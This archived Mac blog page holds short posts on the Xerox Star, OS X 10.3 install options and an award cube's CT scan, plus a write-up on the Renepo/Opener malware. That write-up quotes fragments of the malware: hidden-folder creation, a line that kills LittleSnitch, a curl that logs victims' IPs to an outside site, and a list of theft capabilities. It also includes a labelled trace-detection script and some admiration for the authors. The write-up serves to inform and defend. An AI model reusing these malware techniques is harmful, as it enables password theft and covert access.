In pursuit of textual glory

Month: November, 2004

Xerox Star and Macintosh

Courtesy: http://library.stanford.edu/mac/index.html

Source: Paul Danish, “A Tribute to Apple’s STAR Marketing,” Club Mac News (November 1984), 49-51.
Location: M1007, Apple Computer Inc. Papers, Series 12, Box 18, Folder 16.

Whoever set the show up managed to put the Xerox display right next to Apple’s. That turned out to be an inspired choice, since Xerox was showing the STAR (or the 8010 Information System as Big Gray’s marketing department enthusiastically refers to it), the system which pioneered the Lisa and Macintosh way of doing things.

The STAR (Xerox no longer uses the name in its product literature because a startup company got to it first) was born at Xerox’s Palo Alto Research Center (PARC), the inspiration of some of the most original computer people ever assembled under one roof. Given a great deal of latitude and generous funding, they developed a personal computing system that contains all the major elements found in the Lisa/Mac environment, including program integration (with the ability to combine text, tables, and graphics in the same document), pull-down menus, icons, mouse control, a high resolution, bit-mapped display, and a laser printer.

Indeed, Apple licensed STAR technology for use in Lisa and presumably in Mac. Exactly how much STAR is in Mac isn’t entirely clear, but it is obviously not an insubstantial amount.

The STAR was designed for the Serious Business User. It came with high quality, bundled software that could Do Something, and it came to the market in 1981, well before the IBM PC. At the time, Xerox had a reputation as a leading edge company while IBM was widely considered to have lost its touch.

If Xerox had played its cards right, it might have set the standard for Serious Business Personal Computers. In fact, if Xerox has sold more than 10,000 machines it would be surprising. What happened?

For starters, the STAR concept was conceived at a time when the only hardware powerful enough was in the minicomputer class. The system is in effect a personal minicomputer instead of a personal microcomputer, and that means it embodies most of the minicomputer industry’s bad habits.

From the perspective of the personal user, it’s badly over-priced. Xerox is presently asking $9,995 for a base system. [and] is designed to work with a laser printer that costs $38,000. That means the system is well beyond the price of individual users and small businesses.

Everything about the STAR is proprietary and closed, which means no clones– and no third party software. This is particularly astonishing in that the real power of STAR-Lisa-Macintosh technology lies in the fact that the operating environment makes it insanely easy for the user to learn new programs, so easy in fact that it makes sense for the owner of such a machine to buy software that will only be used occasionally. Xerox appears to have totally overlooked this capability, which promises a quantum jump in the usefulness of personal computers, not to mention the market for applications packages.

A measure of how closed the system is lies in the fact that Xerox does not even call it a personal computer, preferring instead the term “personal workstation.” In fact the distinction is more than semantic, since Xerox hasn’t bothered to provide the tools that allow the user to do any independent programming.

[p. 50] Xerox spokesmen maintain the STAR was never intended to be aimed at the personal computer market, and that is plausible considering the state of the art in hardware at the time it was developed. The STAR is a 16-bit machine with anywhere from 768K to 1.5 megabytes of memory and a 10-megabyte hard disk, which in 1981 put it a generation ahead of the 8-bit personal computers of the time.

What is not plausible, what is in fact incredible, is that Xerox did nothing to adapt STAR technology to a personal computer. It still maintains it is only interested in the Fortune 500 market.

At the show the STAR was being demonstrated by a woman who knew the system cold. During the 20 minutes I watched she had one interested prospect. Over at the Apple display a guy was demoing Mac packages for The Rest of Us as fast as he could call them up from a hard disk. I got the feeling he had gotten a cram course in most of them the week before. But even at the sparsely-attended show he usually had at least a dozen onlookers.

From the beginning, Apple’s marketing instincts have been good– the Apple II succeeded as much because it was an open system as because it was technologically innovative. It was largely that openness that allowed Apple to beat Tandy in round one of the personal computer wars.

When Apple initially introduced Lisa, however, it brought in a good deal of Xerox’s marketing philosophy, and as a consequence it had a brush with disaster. Macintosh represented a giant step back towards the company’s original roots, which are openness and access as much as they are innovation.

[p. 51] What outrages me is that Xerox took a technology that was so manifestly designed to make the computer accessible and– whether out of short-sightedness or out of greed– marketed it in a way all but guaranteed to make it shrivel and wither.

Steve Jobs says it’s more fun to be a pirate than to join the Navy. Sometimes it’s a far nobler thing to do as well.

Document created on 4 April 2000;
This version published on Wed May 07 2003 19:01:42

Install options in 10.3

“Clean install” is not a Panther (Mac OS X 10.3) installation option, or an option to any version of X. If you hear people say “Clean Install” about Mac OS X, please correct them as that is not the term Apple uses for Mac OS X installation.

Clean install is what you do to Mac OS 8 and 9 (8.0, 8.1, 8.5, 8.6, 9.0 – 9.2.1): you create a fresh System Folder, rename the old one Previous System Folder, and then manually move Preferences, control panels, and extensions over to the new System Folder from your old application installations.

In Mac OS X, you have four installation options, one of which is like a Clean Install but goes under a different name. They are:

1. Erase and install – erases the hard drive and installs a fresh copy of the operating system. This previously caused trouble because a bug in 10.3 made some FireWire hard drives unreadable after installation of 10.3; the problem was narrowed down to Oxford 922 and 911 drives, and Apple has rectified it. Erase and install leaves you with only the backup of your data, assuming the backup is accessible after the installation of the system, so have two copies of every critical file external to your internal hard drive and know how to access them easily.

2. Restore system – restores the operating system and any applications that came with the Mac.

3. Archive and Install – first appeared on retail 10.2 CDs, and is now available on both 10.3 update CDs (the $20 variety) and 10.3 retail CDs. This gives you the option to create a new system folder, while renaming the old one, and to save user and network preferences. If you don’t save user and network preferences, your installed non-Apple applications and your Users folder get moved to the Previous System folder along with the previous operating system. This is the option most like the Mac OS 8 and 9 Clean Install, but it is not called that by Apple. This is the currently recommended way to install a new operating system to make sure you preserve your data. If you Archive and Install 10.2 over 10.3, it may leave behind applications that are newer than the operating system will run. It is recommended you move Apple programs replaced by Archive and Install out of the Applications folder before you Archive and Install 10.2 over 10.3.

4. Upgrade Install – available on upgrade disks of all versions, as well as retail disks. This will simply upgrade an existing X system to a new one, without concerning itself with whether any old system preferences are incompatible with the new system. This is usually not the recommended option because it takes no account of the possibility that an old system may not have compatible parts. It is, however, also the installation which happens if you select no installation option. As such, it is recommended you only do this if you have no non-Apple applications installed, and all your Apple applications are up to date.

Look Inside..

The Apple Design Award.

The Apple Design Award is the ultimate encouragement for every Mac developer, not only for the recognition that it brings but also because it gives them a chance to behold a masterpiece of Apple engineering. I came across the website of Mek & Tosj, who, true to their scientific spirit, took a look inside the Apple Design Award!

They are students at the Netherlands Cancer Institute and are involved in stuff such as the application of biophysical techniques to study cellular processes inside living cells, drug resistance and antigen presentation.

They are avowed Mac users who have an interesting story behind their nicknames, Mek & Tosj. Here it is in their own words:

“In fact, one day while entering the seminar room, our own boss Sjaak said: “Hey, there you have Mek en Tosj” (the latter being the Dutch pronunciation for Mac and Tosh). From that day on we decided to keep our new nicknames, even though today almost half the people on our floor are Mac users ;-)”

On June 29th they won the Apple Design Award in the category “Best Student Mac OS X Project” for their program 4Peaks. With the prize came a beautiful metal cube as a trophy that glowed when it was touched! Curious to know how the cube glowed when touched, they set out to answer the question in a typically scientific manner: by looking inside to find out how it worked. How did the cube notice that it was touched? Opening it up would be a simple solution of course, but they were afraid to break it. Still, curious as scientists can be, here is what they thought of doing:

“we thought of something more elegant to answer the burning questions. We contacted the people of the radiotherapy department in the hospital to see if they perhaps could take an X-ray of the cube and reveal its inner being, just like people had previously done with a Titanium PowerBook and iPod. Unfortunately they told us that they did not have an X-ray machine, we should contact the radio-diagnostic department for that. Instead however, they did have something else: a cone beam CT scan that would even allow 3D reconstruction!”

The Cube was placed in the hospital’s CT scanner and scanned to come up with some really interesting results. Above is the reconstructed image from all the scanned slices! Taking the actual scan only required one 360° gantry rotation of the machine, and took no more than three minutes, in which 600 X-ray images were recorded at a resolution of 512×512 pixels. Next, these images were used to reconstruct the cube in 3D with a resolution of about 1mm cubic voxel size. With the help of OsiriX, the open source medical image package, the data was processed to show what was inside Apple’s Design Award.

“The cube is again a classical example of true Apple design, with eye for detail and beautiful not only outside, but inside as well. Made out of one piece of solid metal, it is not difficult to see why the cube feels relatively heavy. The scan reveals a cylindrical cavity, drilled from below to just under the Apple logo. The bottom of the central cavity is separated from the battery compartment by a circuitry board containing surprisingly many electronic parts. Also from this logic board protrude two Light Emitting Diodes (LEDs) that form the light source from the cube. The fact that these are placed relatively towards the bottom of the cube in combination with a plastic diffusion filter right below the Apple logo, gives the cube its distinct glow.”

The researchers were surprised to find that the Cube was actually powered by 4 alkaline batteries!

But what was most interesting was how it worked. As explained by Mek & Tosj :

“Finally, the question with which it all began, how does it work? The CT scan shows that the bottom plate is electronically isolated from the rest of the cube. The potential difference between the bottom and the sides of the cube is measured by a probe in the bottom plate that is wired to the logic board. The cube notices the touch of a hand by sensing an electric contact between its sides and the bottom plate via the person touching it, a loop closed by the earth.”

The Apple Design Award is an ode to the company that strives to make great products through great industrial design. Congratulations Mek & Tosj!

See it all here.


Renepo worm targets Mac OS X users, Sophos reports – Sophos

Security experts have discovered a worm that targets Apple’s Mac OS X, disguising itself as a shell script. There are currently no reports of the virus in the wild, but experts are concerned that if it spreads, its effects could be serious. – The Mac Observer

Mac users run scared of Renepo – Contractor UK

I came across so many of these reports over the past few days that I decided to do some reading myself. I was so pleasantly surprised with what I found that I decided to post it on my blog so that others have access to one place for all opener-ware!!

CURRENT VERSION: 2.3.8 as of 12 August 2004.


Renepo/Opener started life as an OS X startup item with a shell script that replaces the current hostconfig file with a different copy (which has sharing turned on, among other things). It also copies a few files and the netinfo directory into the Public folder of every user folder. On the first reboot SMB sharing will be turned on, and the information copied to the .info folder will contain the Mac password hashes and the SMB hashes, which are easier to crack. Mr Dimbulb, a senior member of the forum who also happens to be the primary author, introduces his work as follows:

# opener – a startup script to turn on services and gather user info & hashes for Mac OS X

# This script is written for bash (as is noted by the very first line of this script)

For the rest of us, here is what a bash shell script means:

There are several shell script languages. In Mac OS X, the most common shell script is BASH. The default Terminal shell language is TCSH in 10.1 and 10.2, and BASH in 10.3. You should set the Terminal to use the same language you are going to script in so that you have experience using that shell and know exactly how a command will behave. Most shell scripts are written using /bin/sh, so you should change the command line to /bin/sh by just typing /bin/sh. You can write shell scripts in any language.

Also, courtesy oreilly.com:
OS X provides several mechanisms for running programs based on events in the login and startup process. Among these mechanisms are StartupItems, LoginItems, and shell startup scripts (used when you start up Terminal or X11). Each of these mechanisms is powerful in its own right, but they each have certain specific uses.


# Additional code: hard-mac, JawnDoh!, Dr_Springfield, gapple
# Additional ideas and advice: Zo, BSDOSX


The authors have not stated why they developed this particular worm/malware/virus/script, but I could glean from their arguments and counter-arguments in reply to queries from some members that ulterior motives were last on their list. It seems to be more of a fun way of learning. I quote: “hacking and cracking just happen to put a little fun into the learning which can be incredibly dull otherwise. i don’t see how any of what the people (we’re not all kids either) at this forum have written constitutes “causing trouble for everyone” as nothing i have seen here can actually do anything on its own… this script for instance, is not a virus and can not get onto your computer all by itself, someone would have to put it there or trick you into putting it there yourself.” – Scriptkitten.

Also, the senior members at the forum seem more level-headed and responsible than most hackers/crackers/virus writers. For instance, one member says: “What is wrong with us? Nothing. Just don’t take your security for granted. Open a door, and we’ll walk it. All you have to do is keep your doors closed, or watch who’s walking around outside.”


One of the wonderful features of the script is that it actually tells everyone what it does. For example, take a look at the first few lines.
# opener 2.3.8 – a startup script to turn on services and gather user info & hashes for Mac OS X
# To install this script you need admin access or
# physical access (boot from a CD or firewire/usb, ignore permissions on the internal drive) or
# write access to either /Library/StartupItems /System/Library/StartupItems or
# write access to any existing StartupItem (which you can then replace with this script) or
# write access to the rc, crontab, or periodic files (and have them run or install the script) or
# you could trick someone who has an admin account into installing it.

Most of the code in the script seems to have a tag that explains what it does. This seems to be because the final script was not written by one person with the intention of taking down the Mac-using world at one go, but is the painstaking effort of a host of hobbyists who developed it over a while and included these little notes to explain what the code does to those not familiar with it. But I could be wrong.

A few further examples:
# Install this script properly, turn on some services, turn off some (like the firewall)
# if we aren’t already in /System/Library/StartupItems then create a folder with the name of this
# script, copy the script into that folder and also create a StartupParameters.plist file
# If this script is executed it makes itself a StartupItem.


# gather system-wide info like hashes and preferences
# create a hidden folder called .info and some other folders
mkdir -p /.info/private/var /.info/keychains /Library/Preferences/.indexed
mkdir /.info/Library/Application\ Support/ /.info/nistuff /.info/Applications /.info/KRec_Logs
mkdir -p /.info/System/Library/CoreServices /.info/vm /.info/dsniff /.info/Library/WebServer
mkdir /.info/Library/Preferences/Netopia /Library/Preferences/jtr

It was first reported on Oct. 22, 2004 in MacInTouch; I quote:

MacInTouch Reader
“There’s now a real [malware program] out there for Mac OS X that can do some real damage. It doesn’t seem to be too destructive although it does delete some UNIX commands and modifies prefs for a couple of others. It will gather all password info on your machine. For now, let’s call it “Opener.”

My system was responding a bit slowly and a check of my /var/log files showed that they were _all_ empty and had the same mod date. The Activity Monitor showed a process called “john” eating almost an entire processor.

Some further looking showed an unknown startupitem in /Library/StartupItems/ called “opener”. The executable file is a well-commented bash program. It scans for passwords for every user, processes the hashed info using your own Mac, turns on file sharing, and puts all this stuff into an invisible folder called .info on each user’s Public folder.”

It is an amazing piece of coding that shows that the makers are indeed creative. For instance, it uses /Library/StartupItems/, a directory whose items run as root prior to login, and, even better, an admin user can create files in there that will run as root!! Indeed, on reading the forum one comes across a discussion in which the creators of the script were having trouble running it without using sudo. The answer: a startup item.

One of the specialities of the script seems to be harvesting passwords and cracking them by brute force with John the Ripper. The hashes are stored in ~/Public as invisible files, where they are accessible to programs like Windows file sharing, AFP or SMB.

Here is how they log the computer’s IP address, best described in words from the script itself:
# Grab the public and private IP addresses (we need a routine to post, mail or something with these…)
# The line below will ‘visit’ web page that logs the IP address
# The log of ips that have visited is at http://www.antiorario.it/stats/visitors.php
# Viewing the log does not add your ip to the log but you should still proxy!
killall -m LittleSnitch # LittleSnitch will relaunch but hopefully we will sneak by if it is running
#curl http://www.antiorario.net/stelledimari/index.php > /dev/null

Here is a brief summary of what it does:

• Opener tries to install ohphoneX, a teleconferencing program
• It kills LittleSnitch before every Internet connection it makes
• It installs a keystroke recorder
• Allows backdoor access in case someone deletes the hidden account
• Grabs the open-firmware password
• Installs OSXvnc
• Grabs your Office 2004 PID (serial number), as well as serial numbers for Mac OS X Server, Adobe registrations, VirtualPC 6, Final Cut Pro, LittleSnitch, Apple Pro Apps, your DynDNS account, Timbuk2, and webserver users, to name a few.
• It tries to decrypt all the MD5 encrypted user passwords
• Decrypts all users keychains.
• Grabs your AIM logs, and other settings and preferences
• Grabs stuff from your Classic preferences
• Changes your Limewire settings to max out your upload and files.
• The hidden user account is called LDAP-daemon instead of the name hacker used in earlier versions. Looks more innocent than hacker.
• Changes the daily cron task to try to get your password from the virtual memory swapfile
• It installs an app called John The Ripper – a password cracker that uses a dictionary method to crack passwords
• Installs dsniff to sniff for passwords.

All this in the current version, until updated!!
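The traces mentioned on this page (the opener StartupItem, the hidden .info folders, the emptied logs, the LDAP-daemon account) can be checked for with a short script. This is an added example, not part of opener or of the original post; the function names and output labels are made up for illustration, and the paths and strings it looks for are the ones quoted above.

```sh
#!/bin/sh
# Added example: look for the on-disk traces of opener described on this page.
# Function names and output labels are illustrative, not from any real tool.
# ROOT is "/" for the running system, or a mounted volume or backup copy.

# Prints one finding per line; exit status 0 = nothing found, 1 = findings.
check_opener_traces() (
    root="${1:-/}"; root="${root%/}"   # "/" becomes "" so paths join cleanly
    found=0

    # 1. StartupItems: an item named "opener", or any file that still carries
    #    the script's banner comment after being installed under another name.
    for dir in "$root/Library/StartupItems" "$root/System/Library/StartupItems"; do
        [ -d "$dir" ] || continue
        if [ -e "$dir/opener" ]; then
            echo "startupitem: $dir/opener"; found=1
        fi
        hits=$(grep -rl "gather user info & hashes" "$dir" 2>/dev/null || true)
        if [ -n "$hits" ]; then
            echo "$hits" | sed 's/^/banner: /'; found=1
        fi
    done

    # 2. Hidden collection folders created by the script's mkdir lines.
    for dir in "$root/.info" "$root/Library/Preferences/.indexed" \
               "$root/Library/Preferences/jtr"; do
        if [ -d "$dir" ]; then echo "hidden-folder: $dir"; found=1; fi
    done

    # 3. The .info folder placed in every user's Public folder.
    for dir in "$root"/Users/*/Public/.info; do
        if [ -d "$dir" ]; then echo "public-info: $dir"; found=1; fi
    done

    # 4. Logs wiped: the MacInTouch reader found every /var/log file empty.
    total=0; empty=0
    for f in "$root"/var/log/*; do
        [ -f "$f" ] || continue
        total=$((total + 1))
        [ -s "$f" ] || empty=$((empty + 1))
    done
    if [ "$total" -gt 0 ] && [ "$total" -eq "$empty" ]; then
        echo "logs-emptied: all $total files in $root/var/log are zero length"
        found=1
    fi

    [ "$found" -eq 0 ]
)

# Reads account names on stdin (one per line) and prints the ones this page
# gives for opener's hidden user: "LDAP-daemon", or "hacker" in older versions.
# Example input on macOS: dscl . -list /Users
flag_opener_accounts() {
    grep -x -e 'LDAP-daemon' -e 'hacker' | sed 's/^/hidden-account: /'
}

# Stand-alone use: ./check_opener.sh /    (or the path of a mounted volume)
if [ "$#" -gt 0 ]; then
    check_opener_traces "$1"
fi
```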


“From what I hear I suspect that opener won’t run (on OS 10.4), similar to OSX Server which doesn’t like to run anything in the /Library/StartupItems folder. I suspect we’ll have to switch over to /System/Library/StartupItems/ which is not as easy to write to all the time…” – gapple.

Reassuring though it is that installing this particular script requires somebody to have access to your computer, it is always a worry that somebody could make it a payload in future programs. Much has been said about the invulnerability of the Macintosh operating system, especially touting its Unix underpinnings and the fact that it comes with most compromising features turned off by default. But it has to be said that vulnerabilities are patched after somebody has found a way to exploit them. Anyone using Mac OS X has probably seen the quintessential dialog box that asks for your admin password, allowing the installer to install an app which otherwise could not have been installed because of restrictive privileges, and this particular arrangement is, as I see it, a grey area. I suppose somebody could make a trojan that pops up a little dialog box asking for your password and thus delivers a deadly payload, but I could be wrong here. Proposed solutions to this problem have been Windows-style keystroke combinations, aka Ctrl-Alt-Del, to be pressed along with typing the password. Whether these are practical, feasible, and in keeping with the ease-of-use mantra of the Mac OS is debatable. At the end of the day, opener or no opener, certain things have changed and some rules have become even more relevant as a result.

As Mr David E. Frank at Macintouch explains,

the best thing we as users can do to protect ourselves from this type of malware is: protect your admin accounts!
• DON’T log in with an admin account to do day-to-day tasks that do not require admin access.
• DON’T read email while logged in as an admin.
• DON’T execute email attachments whose source you are unsure of.

Some additional steps you can take to protect yourself:
• If you have an always-on internet connection, use a firewall.
• Use an encrypted disk image to secure sensitive data, or use FileVault.
• Keep good backups.
• Watch for security updates from Apple.

Kindly leave comments regarding any part of this write up which you feel is wrong or needs to be amended.